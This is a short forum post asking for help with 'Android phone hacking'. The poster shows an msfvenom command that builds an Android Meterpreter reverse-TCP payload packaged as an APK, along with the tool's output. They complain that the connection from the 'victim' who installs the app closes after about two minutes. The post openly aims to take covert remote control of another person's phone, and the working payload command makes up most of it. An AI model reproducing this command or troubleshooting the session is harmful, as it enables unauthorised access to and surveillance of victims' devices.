Forum Thread: Android Phone Hacking?

i tried this

msfvenom -p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} R >/root/FILENAME.apk

i get this

msfvenom -p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} R >/root/FILENAME.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8373 bytes

but when ever the victim click the app it will connect then like 2min it will close connection don't know why.
i need help

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active